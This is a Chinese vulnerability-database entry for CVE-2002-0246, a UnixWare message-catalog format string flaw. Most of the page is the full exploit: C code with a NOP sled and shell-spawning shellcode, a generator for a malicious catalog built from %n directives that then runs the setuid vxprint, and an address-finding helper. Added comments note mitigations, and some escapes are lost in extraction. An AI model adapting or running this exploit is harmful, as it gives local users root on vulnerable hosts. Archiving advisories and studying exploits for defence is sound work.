Caldera UnixWare 信息目录环境变量格式化字符串漏洞
漏洞ID | 1106604 | 漏洞类型 | 格式化字符串 |
发布时间 | 2002-02-07 | 更新时间 | 2005-05-02 |
CVE-2002-0246 |
CNNVD-200205-099 |
漏洞平台 | UnixWare | CVSS评分 | 7.2 |
|漏洞来源
|漏洞详情
UnixWare 7.1.1 的信息目录（message catalog）库函数存在格式化字符串漏洞。本地用户可以通过修改 LC_MESSAGES 环境变量，使 vxprint 等 setuid 程序读取包含格式化字符串的信息目录，从而提升权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/4060/info
UnixWare is a commercially available Unix Operating System. It was originally developed by SCO, and is now distributed and maintained by Caldera.
A format string vulnerability in the locale subsystem could lead to a user gaining elevated privileges. A local user could potentially supply maliciously crafted message catalogs through the LC_MESSAGES environment variable. This could allow a local user to load arbitrary message catalogs into setuid or setgid programs, and execute arbitrary code with setuid/setgid privileges.
--------------------------expshell.c-----------------------------
#include <stdio.h>
/*
 * Payload buffer that expshell.c's main() copies into the process
 * environment (as EGG=...) before starting a shell.
 *
 * As printed on this page the "\x" escape prefixes have lost their
 * backslashes in extraction, so the literals below read as ordinary
 * text rather than the byte values the inline mnemonics describe.
 *
 * Defender's reading: the long run of 0x90 (x86 NOP) bytes is a NOP
 * sled and the trailing "/bin/ksh" string indicates a shell-spawning
 * stub (per the author's mnemonics; the exact syscall convention is
 * not verified here). An environment variable carrying such content
 * into a setuid program is a strong host-based detection signal.
 */
char shellcode[]=
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"xebx1a" /* jmp <shellcode+28> */
"x33xd2" /* xorl %edx,%edx */
"x58" /* popl %eax */
"x8dx78x14" /* leal 0x14(%eax),%edi */
"x57" /* pushl %edi */
"x50" /* pushl %eax */
"xab" /* stosl %eax,%es:(%edi) */
"x92" /* xchgl %eax,%edx */
"xab" /* stosl %eax,%es:(%edi) */
"x88x42x08" /* movb %al,0x8(%edx)
*/
"x83xefx3b" /* subl $0x3b,%edi */
"xb0x9a" /* movb $0x9a,%al */
"xab" /* stosl %eax,%es:(%edi) */
"x47" /* incl %edi */
"xb0x07" /* movb $0x07,%al */
"xab" /* stosl %eax,%es:(%edi) */
"xb0x0b" /* movb $0x0b,%al */
"xe8xe1xffxffxff" /* call <shellcode+2> */
"/bin/ksh"
;
/*
 * expshell.c entry point.
 *
 * Places the payload in the environment (EGG=...) and points
 * LC_MESSAGES at /tmp, so that a message catalog dropped there by
 * fmt_exp.c is the one a locale-aware program will open. It then
 * starts an interactive tcsh, which inherits this environment.
 *
 * Reviewer notes:
 *  - sprintf() is unbounded; buff is a fixed 1024 bytes.
 *  - putenv()/system() are called without <stdlib.h> and main() has
 *    no return type; the listing relies on pre-C99 implicit
 *    declarations.
 *  - Mitigation, defender's side: setuid/setgid programs should not
 *    honour user-controlled locale paths (LC_MESSAGES pointing at a
 *    world-writable directory), and catalog text must be printed as
 *    data, never used as a format string. The vendor advisory
 *    CSSA-2002-SCO.3 in the references is where the UnixWare fix is
 *    described.
 */
main(int argc, char *argv[])
{
char buff[1024];
/* EGG=<payload>; inherited by the shell and every program it runs */
sprintf(buff, "EGG=%s", shellcode);
putenv(buff);
/* redirect message-catalog lookup to a world-writable location */
putenv("LC_MESSAGES=/tmp");
system("/usr/bin/tcsh");
}
-----------------------------------fmt_exp.c--------------------------------
#include <stdio.h>
#include "shellcode.h"
/* This is base of format string return address */
/* Base address of vxprint is 0x20c7c(134268) */
#define BASE 134268
/*
 * fmt_exp.c entry point.
 *
 * Usage: fmt_exp <ret-address-hex> [offset]
 *
 * Writes a message source file ("testdef") in which every entry is a
 * printf-style format string, compiles it with mkmsgs into "testout",
 * moves the result to /tmp/LC_MESSAGES/vxvm.mesg, and finally execs
 * the setuid program vxprint (LC_MESSAGES is expected to already point
 * at /tmp, as set by expshell.c). The underlying defect is that the
 * program hands catalog text straight to a printf-style function, so
 * "%x"/"%n" directives in the catalog are interpreted rather than
 * printed.
 *
 * Reviewer notes:
 *  - exit(), atol(), strtol(), system(), mkdir() and execl() are used
 *    without their headers; the listing relies on implicit
 *    declarations, and main() has no return type.
 *  - Several literals lost their "\n" escapes in extraction
 *    ("offsetn", "file.n", "%%nn", "0x%xn") and the system("mv ...")
 *    literal is split across two lines; the code is kept exactly as
 *    printed.
 *  - line, n and BASE are hard-coded, target-specific values.
 *  - Return values of fclose(), remove(), system(), mkdir() and
 *    execl() are not checked.
 *  - Defensive takeaways: never use catalog/locale strings as a format
 *    (printf("%s", msg), or a fixed literal format); privileged
 *    programs should ignore or restrict LC_* catalog paths; building
 *    with -Wformat-security surfaces non-literal formats; a catalog
 *    appearing under /tmp/LC_MESSAGES, or mkmsgs run by an
 *    unprivileged user shortly before a setuid binary starts, are
 *    host-level signals worth alerting on.
 */
main(int argc, char *argv[])
{
FILE *fp;
char *retaddr;
long g_len, offset;
int count, count2, line=700, n=19;
if(argc < 2 || argc > 3) {
printf("Usage: %s ret-address offsetn", argv[0]);
exit(1);
}
retaddr = argv[1];
/* optional second argument adjusts the computed value */
if(argc == 3) offset = atol(argv[2]);
else offset = 0;
/* hex address, rebased against BASE, plus the optional offset;
 * strtol() is called with no end-pointer or errno check */
g_len = strtol(retaddr, NULL, 16);
g_len -= BASE;
g_len += offset;
fp = fopen("testdef", "w+");
if(fp == NULL) {
fprintf(stderr, "can not open file.n"); exit(1);
}
/* each catalog entry: n copies of "%10x", then a width-controlled "%x"
 * followed by "%n" (the memory-writing directive); "%%" puts a literal
 * '%' into the file */
for(count=0; count<line; count++) {
for(count2=0; count2<n; count2++)
fprintf(fp, "%%10x");
fprintf(fp, "%%%dx%%nn", g_len);
}
fclose(fp);
/* compile the source into a catalog and stage it where LC_MESSAGES=/tmp
 * will make vxprint find it */
remove("testout");
system("mkmsgs testdef testout");
mkdir("/tmp/LC_MESSAGES", 0755);
system("mv
testout /tmp/LC_MESSAGES/vxvm.mesg");
printf("ret addr = 0x%xn", g_len);
/* the author notes: this could also be any other setuid command */
execl("/usr/sbin/vxprint", "vxprint", "---", NULL);
}
-------------------------------------getret.c--------------------------------------
/*
 * getret.c entry point: prints the address at which the EGG
 * environment variable is found in this process ("%p"). It is a
 * helper for locating the payload placed by expshell.c; the "\n" in
 * the format has been lost in extraction ("%pn").
 *
 * Reviewer notes: implicit int main(), and getenv()/printf() used
 * without <stdlib.h>/<stdio.h>. Defensively, reliance on a
 * predictable environment address is exactly what address
 * randomisation and non-executable stacks defeat; whether UnixWare
 * 7.1.1 offered either is not stated on this page.
 */
main()
{
char *a;
a = getenv("EGG");
printf ("e=%pn", a);
}
|参考资料
来源:XF
名称:unixware-msg-catalog-format-string(8113)
链接:http://www.iss.net/security_center/static/8113.php
来源:CALDERA
名称:CSSA-2002-SCO.3
链接:ftp://stage.caldera.com/pub/security/unixware/CSSA-2002-SCO.3/CSSA-2002-SCO.3.txt
来源:BUGTRAQ
名称:20020210 Unixware Message catalog exploit code
链接:http://online.securityfocus.com/archive/1/255414
来源:BID
名称:4060
链接:http://www.securityfocus.com/bid/4060